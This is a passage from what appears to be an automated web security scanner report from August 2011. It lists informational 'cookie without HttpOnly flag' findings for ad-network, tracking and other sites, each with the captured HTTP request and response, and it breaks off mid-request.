Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki26-18.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 13347
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...

8.23. http://banners.bookofsex.com/go/page/iframe_cm_26400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/page/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:55:59 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,auy/Hn8z06UROlnTRnsrjRPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki45-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 24781
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...

8.24. http://bpx.a9.com/ads/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bpx.a9.com
Path:   /ads/getad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/getad?p=81&v=1&r=884800 HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bpx_ustats=H9E6lfkkcKINL0lkLDa7bMcyM+ZbyQgWfUUUVJt+leVYFchPbhTj0xJaa5lmWyzC

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Set-Cookie: bpx_ustats=H9E6lfkkcKINL0lkLDa7bJcShNvdj16F6DYDYjovIPhCLX94XksgECTBzucy0qr7; Expires=Tue, 16-Aug-2011 18:24:45 GMT; Path=/
Content-Type: text/javascript
Content-Length: 405
Date: Mon, 15 Aug 2011 18:24:45 GMT

a9_render_ad({"s":"300x250","tr":false,"nid":147,"p":81,"n":"Amazon Performance Display Ads Prod","html":"<script language='javascript'>\r\nvar slot = 'tr';\r\nvar base_url = 'http://www.imdb.com/imag
...[SNIP]...

8.25. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 15 Aug 2011 18:58:17 GMT
Date: Mon, 15 Aug 2011 18:55:40 GMT
Content-Length: 895
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCust
...[SNIP]...

8.26. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=124
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:40 GMT
Content-Length: 895
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCust
...[SNIP]...

8.27. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC80L21waWQvMzA0NzA4OQ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=64&exchange_id=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2865308626608336017

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2865308626608336017; Domain=.p-td.com; Expires=Sat, 11-Feb-2012 18:25:05 GMT; Path=/
Location: http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=191&sscs_active=1&partnerUID=2865308626608336017
Content-Length: 0
Date: Mon, 15 Aug 2011 18:25:05 GMT


8.28. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=2&s=1&l=1&t=i&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: ZFFAbh=957B826,20|2_2#365;expires=Sun, 13 Nov 2011 18:55:36 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=957B826,20|2_2#0;expires=Tue, 14 Aug 2012 18:55:36 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=28968
Expires: Tue, 16 Aug 2011 02:58:24 GMT
Date: Mon, 15 Aug 2011 18:55:36 GMT
Connection: close

GIF89a.............!.......,...........D..;


GIF89a.............!.......,...........D..;

8.29. http://g.ca.bid.invitemedia.com/pubm_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g.ca.bid.invitemedia.com
Path:   /pubm_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pubm_imp?returnType=image&key=AdImp&cost=2475900&creativeID=130695&message=eJwlzT0OgCAMhuGrmM6S0JYCdeNHT0PcnIx3t.j2Pkm_9AZm2BbSzHFdgMmQKKsPJjSABs4d9.aQU3EBq7qSpbijca8oiuwTzOk8TkK_6NMssULyahksz2sMyzj_eBJ8XoEzGbU-&managed=false HTTP/1.1
Host: g.ca.bid.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=uWIAAMFiAAAETgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&cost=2.4759&mapped_uid=7-125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF&us_id=1209&creative_id=130695&campaign_id=61138&source_url=http%3A%2F%2Fimdb.com&exch_id=7&auction_id=9438D1EC-137A-41B9-A85A-FC3DB1591307&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fbpx.a9.com%2Famzn%2Fiframe.html&line_item_id=728904&invite_uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1&zip_code=75207
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1; subID="{}"; impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313426607+ \"c4c0133b-0eac-475e-83d5-75db053b7608\"+ 70238+ 29835+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313426573+ \"d7090a0b-960a-46fe-90f5-5e451fe1ab2c\"+ 70238+ 29835+ 1209]}"; camp_freq_p1="eJzjkuF4PYFNgFFi18yln1gUGDV23V//icWA0QLM55LhOLOOBSi7Hir7GkQDZddDZS/dZQbK9kJlT0JlwXwuEY5Vx0EmL940ESjLoMFgwGDBABTtegUS3fb7z0dk0e5mdgEmiS5kUQAIgzND"; exchange_uid="eyIyIjogWyIzNTM5NjU2OTQ2OTMxNTYwNjk2IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFSkYxUkRIYVhLUk43UTQ3eUpPVXdMayIsIDczNDM0MF0sICI3IjogWyIxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYiLCA3MzQzNjRdfQ=="; io_freq_p1="eJzjEuaYFC/AKLFr5tJPLAaMFmCaS5xjj4sAk8R6EEeBQYPBgMmiFywhzDE1WYBZYvGmiVAJBgsGoODkNKAR237/+QgXBAC33hmb"; dp_rec="{\"1\": 1313426619+ \"2\": 1313426607+ \"4\": 1313426573}"; partnerUID=eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE1IjogWyIwMDMwMDEwMDIxOTAwMDAwNzk3NDAiLCB0cnVlXSwgIjg0IjogWyJIaTFIMWh6OTk5OTNlSDJtIiwgdHJ1ZV19; segments_p1="eJzjYubYyMPFxbH/ALPAi2nHPrEA2Sd7mARerN0GZLNwdHYwczFzHGfk4uSYHiBw79iEzywAncMQww=="; __utma=140145771.1424462457.1313432170.1313432170.1313432170.1; __utmb=140145771.4.10.1313432170; __utmz=140145771.1313432170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 15 Aug 2011 18:26:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 15-Aug-2011 18:25:58 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Set-Cookie: impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313432713+ \"69816DAB-3F85-46AF-8D01-3B5FF6A6F956\"+ 70251+ 29836+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313432778+ \"9438D1EC-137A-41B9-A85A-FC3DB1591307\"+ 70251+ 29836+ 1209]}"; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuG4dJdZgFni1Mmln1gUGDXaTgFpA2aL3plAmkuC48w6FgEmiU6wLIMGgwGTxXqwjAzH6wlsAowSu2ZC9O26vx6oj9ECzOcS4Vh1HCS7eNNEqD4GCwagaNcrkOi2338+Iot2N7MD7ehCFgUAlyAwig=="; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEufY4yLAKnHq5NJPLAoMGgwGrBa9M4FsLnGOSfECjBK7ZsIkGC3AbC5hjqnJAswSizdNhEowWDAABSenAVVv+/3nI1wQAPZnGjg="; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

8.30. http://gdyn.cnn.com/1.1/1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdyn.cnn.com
Path:   /1.1/1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1.1/1.gif?1313433963987 HTTP/1.1
Host: gdyn.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:08 GMT
Server: Apache
X-Netacuity: success
Set-Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; expires=Mon, 22 Aug 2011 21:45:08 GMT; domain=.cnn.com; path=/
Set-Cookie: adDEon=true; expires=Mon, 22 Aug 2011 21:45:08 GMT; domain=.cnn.com; path=/
Last-Modified: Wed, 01 Dec 2004 19:27:52 GMT
ETag: "d0a8dd-2b-e6d33e00"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:08 GMT
P3P: CP="NOI DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV STA"
Content-Type: image/gif

GIF89a.............!.......,...........D..;

8.31. http://hire.jobvite.com/CompanyJobs/Careers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: http-cookie-8hr=R3814240431; path=/; expires=Tue, 16-Aug-2011 02:30:44 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:28:03 GMT
Content-Length: 51311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link href="careers_1.css"
...[SNIP]...

8.32. http://hire.jobvite.com/CompanyJobs/careers_1.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/careers_1.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CompanyJobs/careers_1.css HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: http-cookie-8hr=R3814240431

Response

HTTP/1.1 200 OK
Set-Cookie: http-cookie-8hr=R3814240431; path=/; expires=Tue, 16-Aug-2011 02:30:44 GMT
Cache-Control: private,max-age=604800
Content-Type: text/css
Last-Modified: Tue, 20 Jul 2010 18:29:18 GMT
Accept-Ranges: bytes
ETag: "0d3b4763928cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:28:04 GMT
Content-Length: 1874

....jvdlgtext
{
   font-family: Trebuchet MS, Trebuchet, Verdana, Arial, Helvetica, sans-serif;
   font-size: 12px;
}
.jvdlgborder1
{
   border: solid 2px White;
   background-color: White;
}
.jvdlg
...[SNIP]...

8.33. http://hire.jobvite.com/CompanyJobs/careers_8.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/careers_8.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CompanyJobs/careers_8.js?v=128 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: http-cookie-8hr=R3814240431

Response

HTTP/1.1 200 OK
Set-Cookie: http-cookie-8hr=R3814240431; path=/; expires=Tue, 16-Aug-2011 02:30:44 GMT
Cache-Control: private,max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Aug 2011 00:52:28 GMT
Accept-Ranges: bytes
ETag: "02e331dd353cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:28:07 GMT
Content-Length: 84419

.../*
* COPYRIGHT 2011 Jobvite, Inc. All rights reserved. This copyright notice is Copyright Management
* Information under 17 USC 1202 and is included to protect this work and deter copyright infr
...[SNIP]...

8.34. http://i.w55c.net/ping_match.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=PUBMATIC&rurl=http%3A//image2.pubmatic.com/AdServer/Pug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw%26piggybackCookie%3Duid%3A_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchdatran=1; matchtargus=1; wfivefivec=8413bde9-2099-43af-b214-8fee85ef2861; matchbluekai=1; matchgoogle=1

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:26:18 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=8413bde9-2099-43af-b214-8fee85ef2861;Path=/;Domain=.w55c.net;Expires=Wed, 14-Aug-13 18:26:18 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:8413bde9-2099-43af-b214-8fee85ef2861
Via: 1.1 dfw175164010000 (MII-APC/2.0)
Content-Type: text/plain


8.35. http://idpix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=3715 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
